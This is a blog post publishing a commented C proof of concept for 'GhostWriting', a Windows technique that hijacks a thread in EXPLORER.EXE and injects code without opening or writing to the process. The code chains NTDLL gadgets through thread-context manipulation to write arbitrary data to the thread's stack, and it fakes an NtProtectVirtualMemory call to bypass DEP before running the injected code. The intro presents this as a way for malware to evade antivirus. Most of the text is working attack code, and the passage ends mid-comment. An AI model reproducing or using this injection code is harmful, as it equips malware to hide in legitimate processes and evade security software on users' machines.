A paradox: Writing to another process without openning it nor actually writing to it

This post is written in English because it’s the explanation (and release of functional code) of a new technique for win32 based systems called GhostWriting. It’s author, c0de90e7, is a near friend of mine and needed a place to release this awesome code, so I’m very pleased to offer my blog to publish it. Do you want to know how it works? Keep reading 😉

 

The concept

Lots of today’s malicious software (virii, trojans, rootkits, etc.) use remote execution techniques in order to avoid AV software, hide themselves, go resident in more suitable processes, and so on.

Remote execution means a process can somehow inject executable code into another process and trigger the execution of said executable code into the context of that process. Injected code can be both, a DLL that gets loaded into the target process or a bunch of code+data bytes directly written into the memory space of the target process.

What we present here is a new way of accomplishing this task of remote code execution or, in more general terms, remote byte injection.

The basic idea of this method is forgetting about this process-centric idea of remote code execution. This is the challenge: writing and running remote code without actually opening the target process. We will not open any process nor will we write to it. Is this a paradox ? No, it is not. It is true that we are not going to use any OpenProcess, DebugActiveProcess, NtOpenProcess or similar functions. We will not even use any WriteProcessMemory, NtWriteVirtualMemory or alike.

The Proof of Concept

This Proof of Concept is self-explanatory, but feel free to discuss it at comments section 😉

Downloadable version of GhostWriting PoC here.

//////
// Proof Of Concept for GhostWriting technique by c0de90e7.    Spring '2007
//
//

#include <windows.h>

HWND STDCALL GetShellWindow(void);

// Machine code bytes that we will inject into EXPLORER.EXE. When this snippet
// gets executed, it will launch a MessageBox and then return to the address
// indicated in ESI register. ESI will point to a EBFE ( JMP $ ) found into
// NTDLL.DLL, so the hijacked thread will enter an autolock state after the
// user clicks OK in this MessageBox.
UCHAR InjectionCode[]=    {    0x6A,0x00,                    // PUSH 0
                            0xE8,0x0D,0x00,0x00,0x00,    // CALL NEXT
                            // Caption text
                            'G','h','o','s','t','W','r','i','t','i','n','g',0x00,
                            0xE8,0x1D,0x00,0x00,0x00,    // CALL NEXT
                            // Message text
                            'R','u','n','n','i','n','g',' ','i','n','t','o',' ','E','X','P','L','O','R','E','R','.','E','X','E','.','.','.',0x00,
                            0x6A,0x00,                    // PUSH 0
                            0x56,                        // PUSH ESI    ( return address where MessageBoxA should return, we will set ESI so that in points
                                                           // to a EBFE )
                            0x68,0x00,0x00,0x00,0x00,    // PUSH MessageBoxA    ( we will change those 00s to MessageBoxA address in runtime )
                            0xC3    };                    // RET

// This routine will set thread's context to the values we want and wait till
// thread's EIP reaches a point we indicate. For this proof of concept, we
// will also post some GUI messages to the hijacked thread, so that thread's
// common "wait for messages" nature doesn't slow things down.
//
void WaitForThreadAutoLock(HANDLE Thread, CONTEXT* PThreadContext,HWND ThreadsWindow,DWORD AutoLockTargetEIP)
{
    SetThreadContext(Thread,PThreadContext);

    PostMessage(ThreadsWindow,WM_USER,0,0);
    PostMessage(ThreadsWindow,WM_USER,0,0);
    PostMessage(ThreadsWindow,WM_USER,0,0);

    do
    {
        ResumeThread(Thread);
        Sleep(30);    // This could also be Sleep(0) ( Yield, as NtYieldExecution would do ), but in some cases ( windows server versions ) this would
                    // lead to slowdowns or even starvation of the hijacked thread's execution. I have not done further research into this matter, but
                    // I think this is due to the fact that those server versions of windows prioritize non-GUI thread's execution over GUI thread's
                    // execution by default.

        SuspendThread(Thread);
        GetThreadContext(Thread,PThreadContext);
    }
    while(PThreadContext->Eip!=AutoLockTargetEIP);
}

// This routine will disassemble a possible "MOV [REG1],REG2" or "MOV [REG1+xx],REG2" instruction and validate its REG1 and REG2 registers so that:
//    a) They are EBX, EBP, ESI or EDI. We need them to be one of those, since they are the only stable ones when it comes to setting thread's context.
//  b) They are not the same ( REG1!=REG2 ). We need them to be different because we will use REG1 to point to memory and REG2 to write a DWORD.
//
int DisassembleAndValidateMOV(PUCHAR InstructionMemoryBase,ULONG* InstructionMemoryIndex,CONTEXT* PThreadContextBase,DWORD** WritePointer,DWORD** WriteItem,int* MOVRETOffsetFromMemoryRegister)
{
    UCHAR WritePointerRegIndex,WriteItemRegIndex,ModRM;
    DWORD* ArrayOfValidRegisterAddressesInContext[8];

    // Valid register addresses ( non-volatile ones ). NOTE, ESP is not volatile, but we will not be using it either.
    ArrayOfValidRegisterAddressesInContext[0]=NULL;    // EAX, not valid.
    ArrayOfValidRegisterAddressesInContext[1]=NULL;    // ECX, not valid.
    ArrayOfValidRegisterAddressesInContext[2]=NULL;    // EDX, not valid.
    ArrayOfValidRegisterAddressesInContext[3]=&PThreadContextBase->Ebx;    // EBX, valid, non-volatile, stable for setting it with setthreadcontext.
    ArrayOfValidRegisterAddressesInContext[4]=NULL;    // ESP, valid, but we will not use it.
    ArrayOfValidRegisterAddressesInContext[5]=&PThreadContextBase->Ebp;    // EBX, valid, non-volatile, stable for setting it with setthreadcontext.
    ArrayOfValidRegisterAddressesInContext[6]=&PThreadContextBase->Esi;    // ESI, valid, non-volatile, stable for setting it with setthreadcontext.
    ArrayOfValidRegisterAddressesInContext[7]=&PThreadContextBase->Edi;    // EDI, valid, non-volatile, stable for setting it with setthreadcontext.

    if(InstructionMemoryBase[*InstructionMemoryIndex]==0x89)    // Is it a "MOV /r" instruction ?
    {
        ModRM=InstructionMemoryBase[*InstructionMemoryIndex+1];    // if it is, we pick next byte, ModRM. We will diseminate it into Mod,dstRM,srcRM.

        if((ModRM&0x80)!=0)    // We need Mod field to be 00 or 01.
            return FALSE;

        WritePointerRegIndex=ModRM&0x07;    // We pick dstRM ( destination register ).
        WriteItemRegIndex=(ModRM>>3)&0x07;    // We pick srcRM ( source register ).

        if(WritePointerRegIndex==WriteItemRegIndex)    // condition "b)", we need source and destination registers to be different REG1!=REG2.
            return FALSE;

        if((ModRM&0x40)==0)    // if Mod field is 00, it is a "MOV [REG1],REG2" instruction. Otherwise, if it is 01, it is a "MOV [REG1+xx],REG2".
        {    // Mod == 00    =>    "MOV [REG1],REG2"
            if(WritePointerRegIndex==5)    // This is a subcase of "MOV [REG1],REG2" that has to be discarded. When Mod is 00 and destination RM is
                   return FALSE;            // 5 ( the value that would indicate EBP ), the instruction is not "MOV [EBP],REG2", it turns out to be
                                        // "MOV [immediate32],REG2" instead. That immediate32 is a 32 bit address that gets encoded just after
                                          // this ModRM byte ( 89 RM YY YY YY YY, or 89, ModRM byte, immediate32 dword ).

            *MOVRETOffsetFromMemoryRegister=0;    // See Inject routine. This variable will hold the displacement over REG1 register. Since this is
                                                // is the case of a "MOV [REG1],REG2", there is no displacement over REG1, so we set it to 0.

            *InstructionMemoryIndex+=2;    // We increment the instruction memory index by 2, because that's the size of this instruction ( 89 RM ).
        }
        else
        {    // Mod == 01    =>    "MOV [REG1+xx],REG2"
            *MOVRETOffsetFromMemoryRegister=(signed char)InstructionMemoryBase[*InstructionMemoryIndex+2];    // In this case, that "xx" of the
                                                                                                            // instruction is a byte and gets
                                                                                                            // encoded just after the ModRM byte
                                                                                                            // ( 89 RM xx ). So we pick it from
                                                                                                            // instruction memory and set it to
                                                                                                            // this variable as a sign extended
                                                                                                            // byte.
                                                                                                            // NOTE: MOVRETOffsetFromMemoryRegister
                                                                                                            // is a 32 bit integer while this "xx"
                                                                                                            // found in the instruction is a 8 bit
                                                                                                            // integer, thats why we sign extend it
                                                                                                            // by that cast, otherwise, it would not
                                                                                                            // work propperly in negative "xx" cases.

            *InstructionMemoryIndex+=3;    // As we have seen, the encoding of this case takes 3 bytes ( 89 RM xx ), so we increment instruction memory
                                           // index by 3.
        }

        // If the picked registers are valid ( not NULL ), we set them to WritePointer and WriteItem.
        if ((ArrayOfValidRegisterAddressesInContext[WritePointerRegIndex]!=NULL)&&(ArrayOfValidRegisterAddressesInContext[WriteItemRegIndex]!=NULL))
        {
            *WritePointer=ArrayOfValidRegisterAddressesInContext[WritePointerRegIndex];
            *WriteItem=ArrayOfValidRegisterAddressesInContext[WriteItemRegIndex];
        }
        else
            return FALSE;

        return TRUE;    // If we reach this point, all the needed requirements have been met.
    }
    else
        return FALSE;
}

// This is the core routine of this PoC. It will hijack a thread, inject code
// to it's stack ( although it could be anywhere... ) and finally run that code
// afterwards.
//
// NOTE: This function gets hijacked thread's handle, a pointer and a size of
// the code we want and what may seem lees obvious, a window handle owned by
// the hijacked thread. We will use that handle to call WaitForThreadAutoLock
// ( see WaitForThreadAutoLock ).
//
int Inject(HANDLE Thread,DWORD* InjectionCode,ULONG NumberOfDWORDsToInject,HWND ThreadsWindow)
{
    CONTEXT SavedThreadContext;    // This will hold the initial hijacked thread's register state, so that we can resume thread's execution in its
                                // original state after we have finished our injection task.

    CONTEXT WorkingThreadContext;    // This one will hold hijacked thread's state while the thread is hijacked. We will do Get/SetThreadContexts as
                                    // many times as needed, that's what this technique is all about...

    DWORD* WritePointer;    // This two poimters will point into some fields into WorkingThreadContext in order to abstract the registers used in the
    DWORD* WriteItem;        // "MOV [REG1],REG2" instruction that the hijacked thread will be executing. See DisassembleAndValidateMOV routine.

    DWORD JMPTOSELFAddress,MOVRETAddress;    // This two are the addresses of a EBFE ( JMP $ ) and a "MOV [REG1],REG2"+"RET" respectively. We will find
                                               // them into NTDLL.DLL's code sections ( it could be into any module or even other places... ) and we will
                                            // divert hijacked thread's execution to them.

    int MOVRETOffsetFromMemoryRegister;    // See DisassembleAndValidateMOV, this variable holds the displacement over REG1 register found in instruction
                                        // "MOV [REG1],REG2" or "MOV [REG1+xx],REG2". If we find a "MOV [REG1],REG2", then this variable will be set
                                        // to 0, otherwise, if we find a  "MOV [REG1+xx],REG2", this variable will be set to that "xx" value.

    ULONG NumberOfBytesToPopAfterMOVBeforeRET;    // We will look for a pattern like this:
                                                // MOV [REG1],REG2
                                                // RET
                                                // But in order to be more flexible, since this pattern is not very common, we will also accept
                                                // patterns like this:
                                                   // MOV [REG1],REG2
                                                // POP REGx
                                                // POP REGx
                                                // ...
                                                // RET
                                                // This pattern is far more common, it is indeed very common as function's epilogue.
                                                   // So, in order to support working with this pattern, we need to control the amount of stack balancing
                                                // that will take place after that "MOV [REG1],REG2" and before that "RET". We will count the number of
                                                // POP instructions between the MOV and the RET and we will also accept "ADD REG,yy" instructions
                                                // ( which are very common instructions also ), and check if that REG is ESP, taking that "yy" into
                                                // account if that's the case.

    DWORD BASEOfWrittenBytes,DWORDWritingPointer;

    DWORD InjectedCodeExecutionStart;

    DWORD NtProtectVirtualMemoryAddress;    // This will hold the address of NtProtectVirtualMemory API into NTDLL.DLL. We will divert hijacked
                                            // thread's execution flow to that API in the last step of the injection, before actually executing the
                                               // injected code. The purpose of this step ( see next array also ) is to make our injected code bytes that
                                            // have been stored into hijacked thread's stack be PAGE_EXECUTE_READWRITE. By setting thread's EIP to the
                                            // NtProtectVirtualMemory API and setting thread's ESP to a copy of NtProtectVirtualMemoryCallFrame ( that
                                               // we will also inject to the hijacked thread's stack ), we will simulate a call as if the hijacked thread
                                              // itself did the call. This is based on common anti-DEP techniques theory used in some buffer overflow
                                              // exploitation for DEP enabled machines.

    DWORD NtProtectVirtualMemoryCallFrame[1+5+3]=    {    0,                        // return address that will point to JMPTOSELF

                                                        0xFFFFFFFF,                // (pseudo)handle of current process
                                                        0,                        // pointer that will point to base address of memory region (1)
                                                        0,                        // pointer that will point to size of memory region (2)
                                                        PAGE_EXECUTE_READWRITE,    // protection flags
                                                        0,                        // pointer that will point to a DWORD where original protection flags
                                                                                   // will be stored (3)

                                                        0,                        // [1] base address of the memory region where the protection flags are
                                                                                   // to be changed
                                                        0,                        // [2] size of the memory region where the protection flags are to be
                                                                                   // changed
                                                        0    };                    // [3] DWORD to get original protection flags

    HMODULE NTDLLBase;
    PUCHAR NTDLLCode;
    PIMAGE_NT_HEADERS NTDLLPEHeader;
    ULONG NTDLLCodeSize,i,j,k;

    NTDLLBase=GetModuleHandle("NTDLL.DLL");    // We get NTDLL.DLLs module base.
    NtProtectVirtualMemoryAddress=(DWORD)GetProcAddress(NTDLLBase,"NtProtectVirtualMemory");    // We solve NtProtectVirtualMemory API address.

    NTDLLCode=(PUCHAR)((ULONG)NTDLLBase+0x00001000);    // Assume first section starts at Base+1000h, and assume it is a code section...

    NTDLLPEHeader=(PIMAGE_NT_HEADERS)((ULONG)NTDLLBase+((IMAGE_DOS_HEADER*)NTDLLBase)->e_lfanew);    // We get total code size ( of all the code
    NTDLLCodeSize=NTDLLPEHeader->OptionalHeader.SizeOfCode;                                            // sections in NTDLL.DLL ). We also assume those
                                                                                                       // code sections are all contiguos...

    JMPTOSELFAddress=MOVRETAddress=(DWORD)NULL;

    i=0;

    while((i<NTDLLCodeSize)&&((!JMPTOSELFAddress)||(!MOVRETAddress)))    // While there is still machine code to look at and we have not found our
    {                                                                    // two needed patterns ( "JMP $" and "MOV [REG1],REG2"+"RET" ), keep searching
        if(!JMPTOSELFAddress)    // If we still have not found a "JMP $"
        {
            if((NTDLLCode[i]==0xEB)&&(NTDLLCode[i+1]==0xFE))    // check if we have that "JMP $" machine code at this point
            {
                JMPTOSELFAddress=(DWORD)&NTDLLCode[i];    // If we found it, store the address for later usage
                i+=1;    // and increment searching index
            }
        }

        if(!MOVRETAddress)    // If we still have not found a "MOV [REG1],REG2"+"RET"
        {    // check if it is a "MOV [REG1],REG2" or "MOV [REG1+xx],REG2". See DisassembleAndValidateMOV.
            if(DisassembleAndValidateMOV(NTDLLCode,&i,&WorkingThreadContext,&WritePointer,&WriteItem,&MOVRETOffsetFromMemoryRegister))
            {    // If the instruction was a valid ( see requirements criteria on DisassembleAndValidateMOV comments ) one,
                // we have i pointing to the next opcode bytes after that MOV, WritePointer and WriteItem pointing to the correct register fields into
                // WorkingThreadContext and MOVRETOffsetFromMemoryRegister set to the "xx" value in case the MOV instructions was "MOV [REG1+xx],REG2"

                j=i;
                k=0;

                while(j<i+16)    // in a 16 byte range after that MOV
                {
                    if(((NTDLLCode[j]&0xF8)==0x58)&&(NTDLLCode[j]!=0x5C))    // we look for POP REGx instructions
                    {
                        k+=4;    // if that's the case, we increment ESP balancing counter for later calculations.
                        j+=1;    // We increment this subsearch index
                        continue;    // and we continue with a new instruction byte
                    }

                    if ((NTDLLCode[j]==0x83)&&((NTDLLCode[j+1]&0xF8)==0xC0))    // we look for ADD REGx,yy
                    {
                        if(NTDLLCode[j+1]==0xC4)    // if that REGx is ESP,
                            k+=(signed char)NTDLLCode[j+2];    // we add yy amount of bytes to ESP balancing counter for later use

                        j+=3;    // We increment this subsearch index
                        continue;    // and we continue with a new instruction byte
                    }

                    if((NTDLLCode[j]==0xC3)||((NTDLLCode[j]==0xC2)&&(NTDLLCode[j+2]==0x00)))    // we look for a RET or RET n ( with n not above 255 )
                    {                                                                            // if thats the case, we have found the second pattern
                                                                                                // ( MOV + RET ).

                        if(MOVRETOffsetFromMemoryRegister==0)    // if the MOV was a "MOV [REG1],REG2", then i variable was incremented by 2 ( the size
                            MOVRETAddress=(DWORD)&NTDLLCode[i-2];    // of its machine code bytes ), so we set MOVRETAddress to NTDLLCode+i-2.
                        else                                    // else, it was a "MOV [REG1+xx],REG2", so i variable was incremented by 3 ( the size
                            MOVRETAddress=(DWORD)&NTDLLCode[i-3];    // of its machine code bytes ), so we set MOVRETAddress to NTDLLCode+i-3.

                        NumberOfBytesToPopAfterMOVBeforeRET=k;    // we set this variable to the amount accumulated into k ( value that will be added to
                                                                   // ESP after the MOV gets executed and just before executing the RET ).

                        i=j+3;    // we increment i so that it points ahead this pattern
                        break;    // and we finish the subsearch
                    }

                    break;    // if we reach a instruction that is not a POP REGx or ADD REGx,yy, we finish this subsearch
                }
            }
        }

        i++;    // increment i and keep looking for any "JMP $" or "MOV + RET"...
    }

    if((JMPTOSELFAddress)&&(MOVRETAddress))    // If we found those required patterns... fun stuff starts ! ;D
    {
        SuspendThread(Thread);    // we suspend our victim thread, this is where the hijacking starts

        SavedThreadContext.ContextFlags=CONTEXT_FULL;
        WorkingThreadContext.ContextFlags=CONTEXT_FULL;

        GetThreadContext(Thread,&SavedThreadContext);    // we get and save initial thread's state for later restoring it
        GetThreadContext(Thread,&WorkingThreadContext);    // we get the same state again, but this time for messing with it

        // here we calculate the amount of thread's stack space we are going to need ( in order to write our injection bytes there )
        // the calculation is as follows:
        //
        //  INITIAL STACK STATUS                           NEW STACK STATUS
        //  ____________________                         ____________________
        // |                    |<--- Stack Bottom      |                    |<--- Stack Bottom
        // |                    |                       |                    |
        // |                    |                       |                    |
        // |                    |                       |                    |
        // |                    |                       |____________________|
        // |                    |                       |                    |<--- ESP ( and also BASEOfWrittenBytes )
        // |                    |                       |  RESERVED STACK    | ^
        // |                    |                       |  SPACE FOR OUR     | |
        // |                    |                       |  INJECTION         | |   NumberOfBytesToPopAfterMOVBeforeRET==variable        (1)
        // |                    |                       |                    | |                        +
        // |                    |                       |    RESERVED STACK  | |                 sizeof(DWORD)==4                        (2)
        // |                    |                       |     SPACE FOR OUR  | |                        +
        // |                    |                       |         INJECTION  | |  sizeof(NtProtectVirtualMemoryCallFrame)==4+20+12        (3)
        // |                    |                       |                    | |                        +
        // |                    |                       |  RESERVED STACK    | |   NumberOfDWORDsToInject*sizeof(DWORD)==variable        (4)
        // |                    |                       |  SPACE FOR OUR     | |
        // |                    |                       |  INJECTION         | |
        // |____________________|                       |____________________| v
        // |                    |<--- ESP               |                    |<--- Initial ESP
        // |  USED STACK SPACE  |                       |  USED STACK SPACE  |
        // |  USED STACK SPACE  |                       |  USED STACK SPACE  |
        // |  USED STACK SPACE  |                       |  USED STACK SPACE  |
        // |  USED STACK SPACE  |                       |  USED STACK SPACE  |
        // |  USED STACK SPACE  |                       |  USED STACK SPACE  |
        // |  USED STACK SPACE  |                       |  USED STACK SPACE  |
        // |  USED STACK SPACE  |                       |  USED STACK SPACE  |
        // |  USED STACK SPACE  |                       |  USED STACK SPACE  |
        // |____________________|<--- Stack Top         |____________________|<--- Stack Top
        //
        //
        //
        // [1] 0..N > Number of bytes reserved to hold arbitrary ( we just need the space to be there ) bytes, so that the "POP REGx" and/or "ADD REGx,yy"
        //            instructions we have found after the "MOV [REG1],REG2", increment ESP to fit into the next item.
        //
        // [2] 4    > This is the important one. DWORD sized space that will hold a return address. The RET instruction, which comes after the
        //            "MOV [REG1],REG2" and other possible "POP REGx" and/or "ADD REGx,yy" instructions, will pop this return address and divert
        //            execution of the thread to that address.
        //
        // [3] 36   > This will hold 9 DWORDs of a simulated stack frame for a call to NtProtectVirtualMemory API. 1 DWORD for a return address + 5 DWORDs
        //            for the 5 parameters that API function takes + 3 DWORDs for storing 3 local DWORDs that will be pointed to by 3 out of those 5
        //            parameters. Those 3 pointed parameters are output variables the API needs.
        //
        // [4]      > DWORD boundary aligned size of the machine code we are going to inject and later execute.
        //
        BASEOfWrittenBytes=WorkingThreadContext.Esp-((NumberOfDWORDsToInject*sizeof(DWORD))+((1+5+3)*sizeof(DWORD))+sizeof(DWORD)+NumberOfBytesToPopAfterMOVBeforeRET);

        //
        //  STACK STATUS
        //  ____________________
        // |                    |<--- Stack Bottom
        // |                    |
        // |                    |<--- ,*WritePointer ( REG1 ) == BASEOfWrittenBytes - MOVRETOffsetFromMemoryRegister + NumberOfBytesToPopAfterMOVBeforeRET (1)
        // |                    |   ,-| +
        // |                    |   | `MOVRETOffsetFromMemoryRegister ( 0 if using "MOV [REG1],REG2", xx if using "MOV [REG1+xx],REG2" )
        // |____________________|    `--------------------------------------.
        // |                    |<--- ,ESP == BASEOfWrittenBytes (2)       |
        // | dummy a            |   ,-| +                                  |
        // | dummy b            |   | `NumberOfBytesToPopAfterMOVBeforeRET |
        // | .                  |   |                                      |
        // | .                  |   |                                      |
        // | dummy z            |   |                                      |
        // |____________________|   |                                      |
        // | return address (3) |/<-Ž                                      |
        // |____________________|\<----------------------------------------Ž
        // |                    |
        // |                    |
        // |                    |                                            SOMEWHERE INTO NTDLL.DLL's CODE
        // |                    |                                            ________________________________________
        // |                    |              (3) EIP == MOVRETAddress --->|                                        |
        // |                    |                                           |  MOV [REG1],REG2 / MOV [REG1+xx],REG2  |
        // |                    |                                           |  ( POP REGx / ADD REGx,yy )            |
        // |                    |                                           |  .                                     |
        // |                    |                                           |  .                                     |
        // |                    |                                           |  RET / RET n                           |
        // |                    |                                           |________________________________________|
        // |                    |
        // |                    |
        // |                    |                                                     SOMEWHERE INTO NTDLL.DLL's CODE
        // |                    |                                                     _______________________________
        // |                    |    (4) *WriteItem ( REG2 ) == JMPTOSELFAddress --->|                               |
        // |                    |                                                    |  JMP $                        |
        // |                    |                                                    |_______________________________|
        // |                    |
        // |                    |
        // |                    |
        // |____________________|
        // |                    |<--- Initial ESP
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |____________________|<--- Stack Top
        //
        //

        // [1] WritePointer points to some register field into WorkingThreadContext ( REG1 in that "MOV [REG1],REG2", see DisassembleAndValidateMOV )
        //     and we set that chosen register's  value so that REG1+MOVRETOffsetFromMemoryRegister points to the same place where thread's ESP ( see
        //     [2], will have the same value as BASEOfWrittenBytes )+NumberOfBytesToPopAfterMOVBeforeRET points.
        *WritePointer=BASEOfWrittenBytes-MOVRETOffsetFromMemoryRegister+NumberOfBytesToPopAfterMOVBeforeRET;

        // [2] we set the new ESP, just the initial ESP minus the number of bytes needed for our injection
        WorkingThreadContext.Esp=BASEOfWrittenBytes;

        // [3] we divert thread's execution to one of the patterns we have found found: "MOV [REG1],REG2"+...+"RET".
        WorkingThreadContext.Eip=MOVRETAddress;

        // [4] WriteItem points to some register field into WorkingThreadContext ( REG2 in that "MOV [REG1],REG2", see DisassembleAndValidateMOV ) and
        //     we set its value so that it points to the other pattern we found: "JMP $".
        *WriteItem=JMPTOSELFAddress;

        // Now the trick itself: we let thread's execution continue ( see WaitForThreadAutoLock ) and wait till its EIP register gets a value of
        // JMPTOSELFAddress, this is what happens:
        //
        // a) The thread executes that "MOV [REG1],REG2" or "MOV [REG1+xx],REG2": since REG1 or REG1+xx point to a DWORD in stack which is going to be
        //    popped out as a return address, after this instruction gets executed, REG2's value will be stored in stack as a return address.
        // b) After that "MOV [REG1],REG2" or "MOV [REG1+xx],REG2", some "POP REGx" and/or "ADD REGx,yy" may come. Those are useless for our trick, we
        //    have just taken them into account for stack balancing calculations ( see NumberOfBytesToPopAfterMOVBeforeRET calculations in that while{}
        //    loop before ). So those "POP REGx" and/or "ADD REGx,yy" could make ESP advancements, but they are ok since we determined which value ESP
        //    will take before executing the next RET instruction.
        // c) After that set of "POP REGx" and/or "ADD REGx,yy" instructions, we reach a "RET" or "RET n" instruction, so ESP points to a return address
        //    and ( see "a)" ) that return address has REG2's value, which, if you look at [4] step before, points to a "JMP $" instruction. So after
        //    this "RET" or "RET n" executes, thread's execution will be diverted to a "JMP $", which, you can see that, makes the thread enter an
        //    autolock state.
        // d) This WaitForThreadAutoLock routine will eventually see how the hijacked thread's execution reached that autolock state ( I mean, EIP gets
        //    a value equal to JMPTOSLEFAddress ) and let us continue with our thread manipulation tasks... };>
        WaitForThreadAutoLock(Thread,&WorkingThreadContext,ThreadsWindow,JMPTOSELFAddress);

        // Ooookkeeyyy, pretty complex thread manipulation but... what have we achieved so far ? Nothing... nothing ? Not yet, but keep going. This is
        // what we have achieved:
        //
        //
        //  STACK STATUS
        //  ____________________
        // |                    |<--- Stack Bottom
        // |                    |
        // |                    |
        // |                    |
        // |                    |
        // |____________________|
        // |                    |<--- BASEOfWrittenBytes
        // | dummy a            |
        // | dummy b            |
        // | .                  |
        // | .                  |
        // | dummy z            |
        // |____________________|
        // | JMPTOSELFAddress -------------------.
        // |____________________|                |
        // |                    |<--- ESP        |
        // |                    |                |
        // |                    |                |
        // |                    |                |
        // |                    |                |
        // |                    |                |
        // |                    |                |
        // |                    |                |
        // |                    |                |
        // |                    |                |
        // |                    |                |
        // |                    |                |
        // |                    |                |
        // |                    |                |                                    SOMEWHERE INTO NTDLL.DLL's CODE
        // |                    |                |                                    _______________________________
        // |                    |                |      EIP == JMPTOSELFAddress --->\|                               |
        // |                    |                `--------------------------------->/|  JMP $                        |
        // |                    |                                                    |_______________________________|
        // |                    |
        // |                    |
        // |                    |
        // |____________________|
        // |                    |<--- Initial ESP
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |____________________|<--- Stack Top
        //
        //
        // So... it may seem we have nothing here, but we do have something. That return address is now an address that points to "JMP $", this means
        // that, from now on, we can repeat the process as many times as we need/want and we no longer need REG1 to point to that return address and
        // we no longer need that REG2 to point to "JMP $" intruction. We must simply readjust thread's ESP to point to the same initial point we gave
        // it the previous time ( BASEOfWrittenBytes ) and readjust EIP so that it points to the same initial address of the previous time ( that is,
        // MOVRETAddress ). We can set REG1 to be "anywhere" and set REG2 to be "anything", so, from now on, we can write any DWORD to any place. Get
        // the idea ?

        // What comes next is a loop for writing 9 DWORDs that represent a simulated call frame to NtProtectVirtualMemory API. We will simulate a call
        // to this API in order to mark our injection memory ( a range of bytes into the region we reserved for the injection in the stack ) as
        // PAGE_EXECUTE_READWRITE, so that DEP ( Data Execution Prevention ) does not stop us from executing the injected code later on. Let's see
        // NtProtectVirtualMemory's C language prototype:
        //
        // NtProtectVirtualMemory(    IN HANDLE ProcessHandle,
        //                            IN OUT PVOID *BaseAddress,
        //                            IN OUT PULONG NumberOfBytesToProtect,
        //                            IN ULONG NewAccessProtection,
        //                            OUT PULONG OldAccessProtection );
        //
        // Okey, so, it takes 5 parameters, why 9 DWORDs then ?
        //
        // | SIMULATED RETADDR  |                (1) 1st DWORD: This will hold the address to where the API would return after doing its job,
        // | p.1: ProcessHandle |                2nd DWORD: This will hold 0xFFFFFFFF ( -1, current process, see NtProtectVirtualMemoryCallFrame ),
        // | p.2: &BaseAddress -----------.        (2) 3rd DWORD: We will make this have a pointer to the 7th DWORD,
        // | p.3: &NumBytesProt --------. |        (3) 4th DWORD: We will make this have a pointer to the 8th DWORD,
        // | p.4: NewAccessProt |       | |        5th DWORD: This will hold PAGE_EXECUTE_READWRITE ( see NtProtectVirtualMemoryCallFrame ),
        // | p.5: &OldAccessPrt ----.   | |        (4) 6th DWORD: We will make this have a pointer to the 9th DWORD,
        // | BaseAddress        |<--+---+-Ž        (5) 7th DWORD: We will make this to be a pointer to our injection's executable code ( put in the stack )
        // | NumBytesProt       |<--+---Ž        (6) 8th DWORD: We will make this to be the size of our injection's executable code.
        // | OldAccessPrt       |<--Ž            9th DWORD: We do not care about this, we just need to reserve the space...
        //

        // [1] We need to be able to synchronize the moment when NtProtectVirtualMemory finishes and make the thread stop there, so we set this DWORD to
        //     JMPTOSELFAddress ( address of "JMP $" instruction ).
        NtProtectVirtualMemoryCallFrame[0]=JMPTOSELFAddress;

        // [2] We make the 3rd DWORD point to the 7th DWORD, as we are going to write this 9 DWORD array to the stack, just after the return address
        //     we have been using in the previous step, we make the pointer calculations like this:
        //
        //     BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD)+...
        //     BASE + skip dummy DWORDs that will be popped + skip return address+... ( those "..." are the BASE for this 9 DWORD array ).
           //
        // So in this case, to point to 7th DWORD, we need to skip those and then skip 1 more DWORD for the return address of this call frame plus 5
        // DWORDs for the 5 parameters.
        NtProtectVirtualMemoryCallFrame[2]=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD)+((1+5+0)*sizeof(DWORD));

        // [3] We make the 4th DWORD point to the 8th DWORD, we do it as we did it for [2], but we skip a DWORD more
        NtProtectVirtualMemoryCallFrame[3]=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD)+((1+5+1)*sizeof(DWORD));

        // [4] We make the 6th DWORD point to the 9th DWORD, we do it as we did it for [2], but we skip two more DWORDs
        NtProtectVirtualMemoryCallFrame[5]=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD)+((1+5+2)*sizeof(DWORD));

        // [5] This is not as the previous 3, this is not a parameter, it is a local variable, pointed by parameter 2 ( 3rd DWORD ). We make it point
        //     to a point in the stack where we will be injecting executable code. That point will be just after this 9 DWORD call frame, thats why
        //     we skip one more DWORD.
        NtProtectVirtualMemoryCallFrame[6]=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD)+((1+5+3)*sizeof(DWORD));

        // [6] We make 8th DWORD be the size that our injected executable code has
        NtProtectVirtualMemoryCallFrame[7]=NumberOfDWORDsToInject*sizeof(DWORD);

        // Here we write those 9 DWORDs into thread's stack space
        //
        //  STACK STATUS
        //  ____________________
        // |                    |<--- Stack Bottom
        // |                    |
        // |                    |
        // |                    |
        // |                    |
        // |____________________|
        // |                    |<--- ,ESP == BASEOfWrittenBytes
        // | dummy a            |   ,-| +
        // | dummy b            |   | `NumberOfBytesToPopAfterMOVBeforeRET
        // | .                  |   |
        // | .                  |   |
        // | dummy z            |   |                                                                              ( for i from 0 to 8 )---.
        // |____________________|   |                                                                                                      |
        // | JMPTORETAddress    |<--Ž                                          *WriteItem ( REG2 ) == NtProtectVirtualMemoryCallFrame[i] <-|
        // |_______ | __________|    ,MOVRETOffsetFromMemoryRegister                                                                       |
        // |        |           |<---| -                                                                                                   |
        // |        |           | .  `*WritePointer ( REG1 ) == BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD)+i*4 <-Ž
        // |        |           | .                                          SOMEWHERE INTO NTDLL.DLL's CODE
        // |        |           | .                                          ________________________________________
        // |        |           |                  EIP == MOVRETAddress --->|                                        |
        // |        |           |                                           |  MOV [REG1],REG2 / MOV [REG1+xx],REG2  |
